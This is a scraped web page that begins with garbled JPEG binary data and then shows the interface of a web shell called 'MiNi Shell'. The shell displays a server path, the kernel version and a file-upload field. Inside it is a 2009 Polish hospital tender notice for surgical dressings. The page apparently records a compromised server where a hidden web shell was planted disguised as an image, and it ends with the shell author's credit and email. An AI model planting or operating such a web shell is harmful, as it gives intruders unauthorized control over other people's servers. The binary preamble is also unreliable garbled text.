JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090709/231732-N-2009.html

<p class="kh_header"><b>Świdnik: Dostawa materiałów opatrunkowych i obłożeń</b><br>
<b>Numer ogłoszenia: 231732 - 2009; data zamieszczenia: 09.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Bolesława Leśmiana 4, 21-040 Świdnik, woj. lubelskie, tel. 081 7514215, faks 081 7514215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozswidnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych i obłożeń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Dostawa materiałów opatrunkowych i obłożeń. 

Zadanie podzielone jest na 3 pakiety :

Pakiet Nr 1  ( lignina, wata, gaza, serweta operacyjna z nitką radiacyjną,  kompresy gazowe, kompresy włókninowe, plastry,  taśma przylepna włókninowa, przylepce,  siatkowy rękaw  opatrunkowy, opaski gipsowe i podgipsowe).

Pakiet Nr 2 ( opaska dziana podtrzymująca, opaska elastyczna tkana,  gaza jałowa,  przylepce, kompresy włókninowe, kompresy z gazy,  tampony gazowe).

Pakiet Nr 3 ( pakiet zabiegowy cięciowy jałowy, pakiet zabiegowy jałowy, pakiet zabiegowy do operacji wyrostka robaczkowego jałowy, zestaw do cewnikowania jałowy, pakiet zabiegowy do operacji pęcherzyka żółciowego jałowy,  pakiet zabiegowy do histeroskopii jałowy, pakiet kompresów do rurek tracheotomijnych jałowy, zestaw do operacji cystoskopii jałowy, zestaw do porodu jałowy, zestaw dla noworodka jałowy, ręcznik włókninowy jałowy, serweta włókninowa jałowa, serweta z włókniny foliowanej jałowa, podkłady ginekologiczne )


Szczegółowy wykaz asortymentu zawarty jest w Załączniku Nr 1 - Formularz Asortymentowo - Cenowy, dołączonym do specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.10-4, 33.14.11.13-4, 33.14.11.15-9, 33.14.11.19-7, 33.14.11.16-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie jest wymagane<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy, którzy :
1.Udokumentują przez stosowne zaświadczenia  i oświadczenia , że spełniają wymagania zawarte w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( tj. Dz. U.  Nr 223  poz. 1655  z 2007 roku z późn. zm.)  :

- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;

- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;

- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2.Udokumentują przez stosowne zaświadczenia  i oświadczenia , że nie podlegają wykluczeniu z postępowania na podstawie  art. 24 ust. 1 i 2  Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( tj. Dz. U.  Nr 223  poz. 1655  z 2007 roku z późn. zm.).

Ocena spełniania powyższych warunków zostanie dokonana na podstawie przedłożonych niżej wymienionych dokumentów według formularza :spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem publicznym, 

2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej -  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - dokumenty te, winny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.	Aktualne informacje z Krajowego Rejestru Karnego  w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - dokumenty te, winny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.	Aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy - dokumenty te, winny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.	Oświadczenie Oferenta, że 
a/ posiada zabezpieczenie ekonomiczne do wykonania określonego zamówienia.
b/ przyjmuje zasadnicze  postanowienia projektu Umowy - Załącznik Nr 3 do SIWZ, 
c/ spełnia wymagania zawarte w art. 22 ust. 1 ustawy z dnia 29 styczna 2004 r. Prawo zamówień publicznych (tj. Dz. U.  Nr 223  poz. 1655  z 2007 roku z późn. zm.  ),
d/ nie podlega wykluczeniu z postępowania na  podstawie art. 24 ust. 1 i 2  ustawy z dnia 29 styczna 2004 r. Prawo zamówień publicznych ( tj. Dz. U.  Nr 223  poz. 1655  z 2007 roku z późn. zm.),
e/ oferowane wyroby medyczne są dopuszczone do obrotu na terenie Polski,  
zgodnie z załączonym wzorem oświadczenia stanowiącym Załącznik Nr 2 do SIWZ - Formularz Ofertowy
7.	Ponadto każdy Oferent powinien dołączyć wykaz zamówień zrealizowanych w okresie trzech  lat dla szpitali o złożoności i wartości zamówienia zbliżonych do przedmiotu prowadzonego postępowania -  co najmniej 1 dokument  potwierdzający, że dostawa  została wykonana należycie ( referencje odbiorców dostaw ).

Dodatkowe dokumenty :
1.	Wypełniony Formularz Ofertowy  - Załącznik Nr 2 do SIWZ,
2.	Wypełniony Formularz Asortymentowo - Cenowy -  Załącznik Nr 1 do SIWZ.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.spzozswidnik.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W Kasie SP ZOZ w Świdniku,  ew. za zaliczeniem pocztowym w cenie 20 zł brutto - opłata dotyczy formy pisemnej specyfikacji.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2009 godzina 10:00, miejsce: Składanie w Sekretariacie SP ZOZ w Świdniku pok. Nr 1 - I piętro.
Otwarcie dnia 17.07.2009 o godz. 10.15 w Sali Konferencyjnej SP ZOZ w Świdniku    pok. Nr 13 - II piętro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 1  ( lignina, wata, gaza, serweta operacyjna z nitką radiacyjną,  kompresy gazowe, kompresy włókninowe, plastry,  taśma przylepna włókninowa, przylepce,  siatkowy rękaw  opatrunkowy, opaski gipsowe i podgipsowe)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.10-4, 33.14.11.15-9, 33.14.11.13-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 2 ( opaska dziana podtrzymująca, opaska elastyczna tkana,  gaza jałowa,  przylepce, kompresy włókninowe, kompresy z gazy,  tampony gazowe)..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.13-4, 33.14.11.19-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 3 ( pakiet zabiegowy cięciowy jałowy, pakiet zabiegowy jałowy, pakiet zabiegowy do operacji wyrostka robaczkowego jałowy, zestaw do cewnikowania jałowy, pakiet zabiegowy do operacji pęcherzyka żółciowego jałowy,  pakiet zabiegowy do histeroskopii jałowy, pakiet kompresów do rurek tracheotomijnych jałowy, zestaw do operacji cystoskopii jałowy, zestaw do porodu jałowy, zestaw dla noworodka jałowy, ręcznik włókninowy jałowy, serweta włókninowa jałowa, serweta z włókniny foliowanej jałowa, podkłady ginekologiczne ).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.00-1, 33.14.11.16-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com